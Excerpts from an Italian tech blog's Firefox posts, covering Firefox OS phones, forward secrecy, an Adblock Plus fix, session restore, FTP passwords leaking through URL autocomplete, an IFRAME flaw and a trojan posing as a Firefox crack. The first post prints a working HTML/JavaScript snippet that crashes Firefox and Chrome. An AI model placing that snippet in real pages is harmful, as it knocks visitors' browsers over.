Ammazzabrowser

<!DOCTYPE html>
<html>
 <head>
 <script>
 location = 'data:text/html,<script>location = "location.toString + \"A\"";' + 'A'.repeat( 100000000 );
 </script>
 </head>
</html>

Questo semplice testo in una pagina HTML manda a zampe all’aria Firefox e Google Chrome, mentre Internet Explorer esce illeso.

Potete farlo da voi oppure andare a vostro rischio su crashfirefox.com. Leggi tutto “Ammazzabrowser”

Metti una volpe nel cellulare con #FirefoxOS

FirefoxOSPassando davanti a un negozio di cellulari del nostro ex-monopolista di telefonia radiomobile, ho visto in vetrina un prodotto di cui avevo già letto, ma che pensavo fosse ancora di la da venire sul mercato; ovviamente mi sbagliavo e penso sia utile aggiornare anche altri Geek smemorati come me.

Si tratta di un cellulare dotato del nuovo sistema operativo Firefox OS prodotto dalla Mozilla Foundation : in Italia per il momento questo apparecchio è distribuito in esclusiva da TIM (lo scopo di questo post non è pubblicitario e quindi non aggiungo nessun link, chi fosse interessato ad approfondire può fare una ricerca sul web per marca e modello: Alcatel One Touch Fire).

Tutti sappiamo che Mozilla è nata da una costola di Netscape con lo scopo originario di dedicarsi allo sviluppo della versione opensource di Netscape Navigator nella forma di una suite integrata di nome Mozilla Application Suite.
Per quanto questo ultimo prodotto non abbia mai avuto grande successo di pubblico, esattamente il contrario si può dire del successivo prodotto di Mozilla: Firefox il browser che, prima dell’arrivo di Google Chrome, riuscì finalmente a scardinare il monopolio di Internet Explorer non a colpi di carta bollata, ma, più coerentemente con il mondo dell’informatica, tramite una dotazione tecnologica che gli era in buona sostanza superiore da ogni punto di vista. Firefox OS nasce appunto dall’esperienza accumulata su questo browser. Leggi tutto “Metti una volpe nel cellulare con #FirefoxOS”

Perfect Forward Secrecy

Il protocollo HTTPS come è implementato da molti siti o browser ha un problema con il futuro.

Ipotizzando che qualcuno stia registrando tutto il traffico HTTPS di un sito adesso potrebbe solamente avere in mano dei dati illeggibili. Ma cosa succederebbe se venisse trafugata la chiave segreta, oppure se un domani i computer riuscissero in poche settimane a scardinare la chiave utilizzata?

C’è un passaggio fondamentale nei primi millisecondi del protocollo HTTPS:

Il browser, verificato il certificato, invia un messaggio al server che contiene un altro numero casuale cifrato con la chiave pubblica del server

Quindi, chi riuscisse a calcolare o trafugare la chiave privata del server potrebbe decifrare tutto il traffico HTTPS protetto con quella coppia di chiavi, ipoteticamente salvato negli anni, che fino a quel momento non era decifrabile (retrospective decryption).

Lo scambio di una chiave segreta condivisa su un canale non sicuro è un problema non nuovo. Whitfield DiffieMartin Hellman e Ralph Merkle avevano trovato una soluzione già negli anni ’70 del secolo scorso elaborando quello che poi sarebbe diventato il protocollo Diffie-Hellman per lo scambio di chiavi (brevetto US4200770 ora scaduto).

Anche in questo caso bisogna fare un passo indietro per vedere come funzionano le cose dietro le quinte.

Leggi tutto “Perfect Forward Secrecy”

Aggiornate le Ad-Block Plus subscriptions…

Ieri, in ufficio, mi sono trovato davanti ad un piccolo problema… l’impossibilità di leggere tutta la mia posta da GMail su tutti i domini che ho passato a Google Apps utilizzando Firefox (8).
La cosa strana (e che mi ha tratto in inganno) è che questo problema è sorto in parallelo con la modifica dell’interfaccia al “new look” per tutti i domini. Il titolo era visibile, ma basta… per leggerne il contenuto mi vedevo costretto ad utilizzare la funzione di lettura del messaggio originale (ma c’è tanta gente che ancora manda solo messaggi in HTML senza la versione testo).

A casa, però, questo non accadeva… così ho pensato che il problema potesse essere momentaneo (dovuto appunto al passaggio al nuovo look) oppure legato al firewall aziendale (scritto con il deretano da una società di Roma).

Oggi, in ufficio… di nuovo lo stesso problema… e così ho provato Chrome e… wow, tutto funziona egregiamente. Al che mi sono messo un po’ lì a studiare il problema per arrivare alla conclusione che la colpa di questo malfunzionamento è da addebitare al plug-in Ad-Block Plus ed in particolare alle “subscriptions” che sembrano fare a pugni con le ultime modifiche di GMail.

Quindi, per risolvere il problema, da Firefox, mi è bastato fare:

  • Tools -> Adblock Plus Preferences…

per poi, salla dalla finestra delle preferences, fare:

  • Filters -> Update all subscriptions… (oppure Ctrl-Shift-T)

 

Sapevatelo.

Quando esci, ricordati di salvare

Sicuramente molti tra i lettori avranno aderito alla beta della versione 4 di Mozilla FireFox. Da pochi giorni l’applicativo è nella fase Release Candidate, quindi si presume che ci sarà un picco nella migrazione a questa versione del browser a breve.
Chi già usa questo prodotto, avrà notato che, a partire dal rilascio 10 della beta, il browser si chiude senza più chiedere se salvare le linguette aperte, dandoci quindi una spiacevole sorprese alla riapertura, quando scopriamo che tutti i siti che stavamo consultando sono improvvisamente andati a farsi benedire.

Una soluzione a questo inconveniente è usare il comando Restore Previous Session che si trova nel menu History e permette appunto di riaprire i tab dall’ultima sessione di lavoro, altrimenti si può ripristinare il comportamento predefinito della versioni precedenti andando a modificare alcuni parametri di configurazione.
Per accedere alle impostazioni, ricordiamo che bisogna battere about:config nella barra degli indirizzi ed eventualmente confermare il messaggio informativo che appare.

Leggi tutto “Quando esci, ricordati di salvare”

Firefox: esposizione della password nell’URL

In mancanza di altri programmi i browser possono essere utilizzate anche come client FTP.

Per collegarsi, ad esempio, a mail.siamogeek.com con l’utente utente e la password segreta si può digitare questo URL:

ftp://utente:segreta@mail.siamogeek.com

Purtroppo Firefox registra questo URL nella cache, quindi se, dopo essersi collegati la prima volta a questo sito, si digita di nuovo l’inizio (o parte) dell’URL ecco cosa appare:

State, quindi, attenti se utilizzate browser altrui per collegarvi a siti di cui non volete rivelare la password.

Una segnalazione del baco è già presente in Bugzilla.

No, l’utente utilizzato per questa dimostrazione non esiste più, è inutile tentare, tanto non funziona. (via Bugtraq)

Scoperto un problema di sicurezza di Firefox

FirefoxTreatpost segnala un problema di sicurezza che interessa tutte le versioni di Firefox scoperto da Armorize.

Il browser non controlla gli indirizzi offuscati a cui si accede attraverso IFRAME, permettendo ad un attaccante di confondere o nascondere l’indirizzo del sito che si sta effettivamente visitando.

Leggi tutto “Scoperto un problema di sicurezza di Firefox”

Finto crack per Firefox 4.0 nasconde un trojan

FirefoxGira in rete un presunto crack per Firefox 4.0 che dovrebbe “sbloccare” il programma o attivare nuove funzionalità. Ovviamente è un fake che va ad installare sul computer un trojan…

Firefox è libero, gratuito e non necessita di registrazione o codici di attivazione.

L’ultima versione stabile di Firefox al momento in cui scrivo è la 3.6.8. La versione 4.0 è ancora una beta e se ne sconsiglia l’uso ai non smanettoni.

State attenti li fuori…